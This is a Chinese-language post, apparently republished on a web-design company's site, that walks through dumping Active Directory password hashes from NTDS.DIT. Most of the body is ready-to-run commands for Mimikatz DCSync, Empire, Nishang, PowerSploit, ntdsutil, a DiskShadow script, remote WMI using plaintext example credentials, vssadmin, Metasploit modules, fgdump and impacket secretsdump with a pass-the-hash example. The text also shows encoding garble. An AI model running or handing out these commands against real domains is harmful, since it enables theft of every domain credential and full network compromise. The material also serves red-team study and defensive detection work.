這篇文章主要為大家展示了“如何導(dǎo)出域密碼哈希值”�����,內(nèi)容簡(jiǎn)而易懂,條理清晰�,希望能夠幫助大家解決疑惑�����,下面讓小編帶領(lǐng)大家一起研究并學(xué)習(xí)一下“如何導(dǎo)出域密碼哈希值”這篇文章吧�����。
創(chuàng)新互聯(lián)建站專注于庫(kù)車(chē)企業(yè)網(wǎng)站建設(shè),成都響應(yīng)式網(wǎng)站建設(shè),商城開(kāi)發(fā)�。庫(kù)車(chē)網(wǎng)站建設(shè)公司,為庫(kù)車(chē)等地區(qū)提供建站服務(wù)��。全流程按需定制設(shè)計(jì)�����,專業(yè)設(shè)計(jì)�,全程項(xiàng)目跟蹤,創(chuàng)新互聯(lián)建站專業(yè)和態(tài)度為您提供的服務(wù)
在域內(nèi)HASH是存在NTDS.DIT中的�, NTDS.DIT是一個(gè)二進(jìn)制文件��,就等同于本地計(jì)算機(jī)的SAM文件����,它的存放位置是%SystemRoot%\ntds\NTDS.DIT。這里面包含的不只是Username和HASH���,還有OU�����、Group等信息����。
和SAM文件一樣,該文件也是被系統(tǒng)鎖定的���。因此��,我們也無(wú)法直接將其復(fù)制并拷貝至其它位置�����,以提取其中的信息����。
以下是幾種最常見(jiàn)的被用于提取.dit文件信息的技術(shù):
1.Domain Controller Replication Services(域控制器復(fù)制服務(wù))
2.Native Windows Binaries
3.WMI
Mimikatz
Mimikatz有一個(gè)功能(dcsync)��,利用目錄復(fù)制服務(wù)(DRS)從NTDS.DIT文件中檢索密碼哈希值��。該技術(shù)消除了直接從域控制器進(jìn)行認(rèn)證的必要性��,因?yàn)樗梢詮挠蚬芾韱T環(huán)境中屬于域的任意系統(tǒng)執(zhí)行。因此�����,這也是一項(xiàng)用于紅隊(duì)的標(biāo)準(zhǔn)技術(shù)���。
lsadump::dcsync /domain:pentestlab.local /all /csv
通過(guò)使用/user參數(shù)指定域用戶名����,Mimikatz會(huì)將該指定用戶的所有帳戶信息轉(zhuǎn)儲(chǔ)包括哈希值�����。
lsadump::dcsync /domain:pentestlab.local /user:test
或者我們可以直接在域控制器中執(zhí)行Mimikatz�����,通過(guò)lsass.exe進(jìn)程dump密碼哈希��。
privilege::debug
lsadump::lsa /inject
此時(shí)�,將會(huì)檢索域用戶的密碼哈希值。
Empire
PowerShell Empire有兩個(gè)模塊,可以通過(guò)DCSync攻擊檢索域哈希�����。 這兩個(gè)模塊都需要以域管理員的權(quán)限執(zhí)行�,并且他們都使用Microsoft復(fù)制服務(wù)。這兩個(gè)模塊依賴于Invoke-Mimikatz PowerShell腳本�,來(lái)執(zhí)行與DCSync相關(guān)的Mimikatz命令。以下模塊的哈希提取格式類似于Metasploit hashdump的輸出格式����。
usemodule credentials/mimikatz/dcsync_hashdump
DCSync模塊需要我們指定用戶,以提取帳戶的所有信息�。
執(zhí)行完成后,我們將獲取到以下信息:
Nishang
Nishang是一個(gè)PowerShell攻擊框架����,它是PowerShell攻擊腳本和有效載荷的一個(gè)集合,并被廣泛應(yīng)用于滲透測(cè)試的各個(gè)階段���。Copy-VSS腳本可用于自動(dòng)化的提取需要的文件:NTDS.DIT�����,SAM和SYSTEM���。這些文件將被提取到當(dāng)前的工作目錄或你指定的文件夾中。
Import-Module .\Copy-VSS.ps1
Copy-VSS
Copy-VSS -DestinationDir C:\ShadowCopy\
或者���,可以通過(guò)加載PowerShell擴(kuò)展�,來(lái)從現(xiàn)有的Meterpreter會(huì)話中執(zhí)行腳本。
load powershell
powershell_import /root/Copy-VSS.ps1
powershell_execute Copy-VSS
也可以使用powershell_shell命令建立一個(gè)PowerShell會(huì)話�,通過(guò)導(dǎo)入腳本來(lái)提取文件。
Copy-VSS
Copy-VSS -DestinationDir C:\Ninja
PowerSploit
PowerSploit包含PowerShell腳本�����,該腳本使用卷影復(fù)制服務(wù)創(chuàng)建可用于提取文件的新卷��。
Import-Module .\VolumeShadowCopyTools.ps1
New-VolumeShadowCopy -Volume C:\
Get-VolumeShadowCopy
或者通過(guò)加載PowerShell擴(kuò)展�,從現(xiàn)有的Meterpreter會(huì)話中執(zhí)行。
powershell_shell
New-VolumeShadowCopy -Volume C:\
Get-VOlumeShadowCopy
可以使用copy命令將文件從新卷復(fù)制到目標(biāo)���。
Invoke-DCSync
Invoke-DCSync是一個(gè)由Nick Landers和leverages PowerView開(kāi)發(fā)的PowerShell腳本���,Invoke-ReflectivePEInjection和PowerKatcher使用Mimikatz的DCSync方法來(lái)檢索哈希值。直接執(zhí)行該函數(shù)將生成以下輸出:
Invoke-DCSync
可以看到結(jié)果是以表格的形式輸出的���。如果我們添加-PWDumpFormat參數(shù)�,則輸出格式為user:id:lm:ntlm:::
Invoke-DCSync -PWDumpFormat
從現(xiàn)有的Meterpreter會(huì)話中運(yùn)行腳本�,可以獲取到相同的輸出結(jié)果。
添加-PWDumpFormat參數(shù)后:
ntdsutil
ntdsutil是一個(gè)命令行工具,是域控制器生態(tài)系統(tǒng)的一部分����,其主要用途是使管理員能夠輕松訪問(wèn)和管理Windows Active Directory數(shù)據(jù)庫(kù)�。但它常被滲透測(cè)試人員或紅隊(duì)隊(duì)員濫用來(lái)獲取現(xiàn)有的ntds.dit文件快照,并且可以將該文件復(fù)制到新的租約中�����,以進(jìn)行離線的分析和密碼哈希的提取�����。
ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit
它將為我們生成兩個(gè)新文件夾:Active Directory和Registry�。NTDS.DIT文件將被保存到Active Directory中,而SAM和SYSTEM文件則將被保存到Registry文件夾中����。
DiskShadow
DiskShadow是一個(gè)Microsoft簽名二進(jìn)制文件,用于協(xié)助管理員執(zhí)行與卷影復(fù)制服務(wù)(VSS)相關(guān)的操作����。這個(gè)二進(jìn)制文件有兩個(gè)模式interactive和script ,腳本將包含自動(dòng)執(zhí)行NTDS.DIT提取過(guò)程所需的所有命令��。我們可以在腳本文件中添加以下行,以創(chuàng)建新的volume shadow copy(卷影復(fù)制)���,掛載新驅(qū)動(dòng)���,執(zhí)行復(fù)制命令以及刪除volume shadow copy。
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
delete shadows volume %someAlias%
reset
需要注意的是�����,DiskShadow二進(jìn)制文件需要從C:\Windows\System32路徑執(zhí)行�。如果從其它路徑調(diào)用它,腳本將無(wú)法正確執(zhí)行��。
diskshadow.exe /s c:\diskshadow.txt
直接從解釋器運(yùn)行以下命令���,將列出系統(tǒng)的所有可用volume shadow copy�����。
diskshadow
LIST SHADOWS ALL
SYSTEM注冊(cè)表hive也應(yīng)該被復(fù)制��,因?yàn)槠浒私饷躈TDS文件內(nèi)容所需的密鑰����。
reg.exe save hklm\system c:\exfil\system.bak
WMI
Sean Metcalf在他的博客中證明,可以通過(guò)WMI遠(yuǎn)程提取NTDS.DIT和SYSTEM文件�����。該項(xiàng)技術(shù)利用vssadmin二進(jìn)制文件來(lái)創(chuàng)建卷影復(fù)制�����。
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
然后�,它將遠(yuǎn)程執(zhí)行復(fù)制命令�,并將卷影復(fù)制中的NTDS.DIT文件提取到目標(biāo)系統(tǒng)上的另一個(gè)目錄中。
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
這也同樣適用于SYSTEM文件�����。
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1"
之后��,被提取的文件將會(huì)從域控制器被傳輸?shù)搅硪粋€(gè)Windows系統(tǒng)���,以轉(zhuǎn)儲(chǔ)域密碼哈希值�。
PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\ntds.dit C:\temp
PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\SYSTEM.hive C:\temp
如果已生成黃金票據(jù)���,則可以使用它代替憑據(jù)����,通過(guò)Kerberos與域控制器進(jìn)行身份驗(yàn)證。
vssadmin
volume shadow copy是一個(gè)Windows命令行實(shí)用程序���,管理員可以使用它備份計(jì)算機(jī)����,卷以及文件(即使操作系統(tǒng)正在使用這些資源)���。Volume Shadow Copy作為一個(gè)服務(wù)運(yùn)行�����,并要求文件系統(tǒng)的格式為NTFS(默認(rèn)情況下windows操作系統(tǒng)文件格式均為NTFS)���。從Windows命令提示符執(zhí)行以下命令,將會(huì)創(chuàng)建一個(gè)C盤(pán)的快照�����,這樣我們就可以將其復(fù)制到另一個(gè)位置(如本地文件夾��,網(wǎng)絡(luò)文件夾或可移動(dòng)介質(zhì))以獲取它的訪問(wèn)權(quán)限���。
vssadmin create shadow /for=C:
由于我們已經(jīng)將C盤(pán)中的所有文件都復(fù)制到了另一個(gè)位置(HarddiskVolumeShadowCopy1)����,因此它們不會(huì)被操作系統(tǒng)直接使用,我們可以隨意訪問(wèn)并復(fù)制其中的文件����。使用copy命令將NTDS.DIT和SYSTEM文件,復(fù)制到本地名為ShadowCopy的驅(qū)動(dòng)中的新建文件夾中�����。
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
我們需要將這些文件從域控制器復(fù)制到另一個(gè)主機(jī)以進(jìn)一步的處理��。
vssown
Tim Tomes開(kāi)發(fā)了一個(gè)與vssadmin類似的實(shí)用程序vssown����,它可以創(chuàng)建和刪除卷影復(fù)制��,從未掛載的卷影復(fù)制運(yùn)行任意可執(zhí)行文件�����,以及啟動(dòng)和停止卷影復(fù)制服務(wù)����。
cscript vssown.vbs /start
cscript vssown.vbs /create c
cscript vssown.vbs /list
cscript vssown.vbs /delete
所需文件可以使用copy命令來(lái)復(fù)制����。
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\ntds\ntds.dit C:\vssown
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\system32\config\SYSTEM C:\vssown
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\system32\config\SAM C:\vssown
Metasploit
Metasploit框架中有一個(gè)模塊����,可以通過(guò)SMB服務(wù)直接與域控制器進(jìn)行身份驗(yàn)證,創(chuàng)建系統(tǒng)驅(qū)動(dòng)的卷影復(fù)制�����,并將NTDS.DIT和SYSTEM hive的副本下載到Metasploit目錄中��。這些文件可以與impacket等其他工具一起使用�����,這些工具可用于執(zhí)行活動(dòng)目錄密碼哈希值的提取����。
auxiliary/admin/smb/psexec_ntdsgrab
還有一個(gè)后利用模塊,可以鏈接到現(xiàn)有的Meterpreter會(huì)話�����,并通過(guò)ntdsutil方法檢索域哈希。
windows/gather/credentials/domain_hashdump
或者�����,如果有現(xiàn)成的到域控制器的Meterpreter會(huì)話���,則可以使用hashdump命令����。但該方法并不安全����,因?yàn)樗苡锌赡軙?huì)導(dǎo)致域控制器崩潰���。
hashdump
fgdump
fgdump是一個(gè)用于提取LanMan和NTLM密碼哈希值的工具�。如果已獲取本地管理員憑據(jù)����,則可以在本地或遠(yuǎn)程執(zhí)行。在執(zhí)行期間�,fgdump將嘗試禁用系統(tǒng)上運(yùn)行的殺毒軟件,如果成功���,則會(huì)將所有數(shù)據(jù)寫(xiě)入到兩個(gè)文件中����。如果存在殺軟,則建議最好不要使用fgdump來(lái)轉(zhuǎn)儲(chǔ)密碼哈希�����。因?yàn)?�,大多?shù)安全公司的殺毒軟件(包括Microsoft的Windows Defender)都對(duì)其進(jìn)行了標(biāo)記��。
fgdump.exe
通過(guò)檢查.pwdump文件的內(nèi)容來(lái)檢索密碼哈希值�。
type 127.0.0.1.pwdump
NTDS 竊取
Impacket是一組python腳本,可用于執(zhí)行各種任務(wù)���,包括提取NTDS文件的內(nèi)容���。impacket-secretsdump模塊需要我們提供SYSTEM和NTDS數(shù)據(jù)庫(kù)文件。
impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
此外�,impacket可以通過(guò)使用計(jì)算機(jī)帳戶及其哈希進(jìn)行身份驗(yàn)證從NTDS.DIT文件遠(yuǎn)程轉(zhuǎn)儲(chǔ)域密碼哈希。
impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
作為impacket的替代解決方案�����,NTDSDumpEx二進(jìn)制文件可以從Windows主機(jī)中提取域密碼哈希值。
NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive
還有一個(gè)shell腳本adXtract����,可將用戶名和密碼哈希導(dǎo)出為一種可被常見(jiàn)的密碼破解程序使用的格式,例如John the Ripper和Hashcat�����。
./adXtract.sh /root/ntds.dit /root/SYSTEM pentestlab
該腳本將所有信息寫(xiě)入項(xiàng)目名稱下的各個(gè)文件中��,當(dāng)數(shù)據(jù)庫(kù)文件NTDS的解密完成后����,用戶列表和密碼哈希值將會(huì)導(dǎo)出到控制臺(tái)中。該腳本將為我們提供大量有關(guān)域用戶的信息����,如下所示。
密碼哈希將以下列格式顯示�。
以上是“如何導(dǎo)出域密碼哈希值”這篇文章的所有內(nèi)容����,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內(nèi)容對(duì)大家有所幫助�,如果還想學(xué)習(xí)更多知識(shí),歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道����!
本文題目:如何導(dǎo)出域密碼哈希值
轉(zhuǎn)載來(lái)于:
http://weahome.cn/article/psoioc.html
重慶分公司
重慶分公司
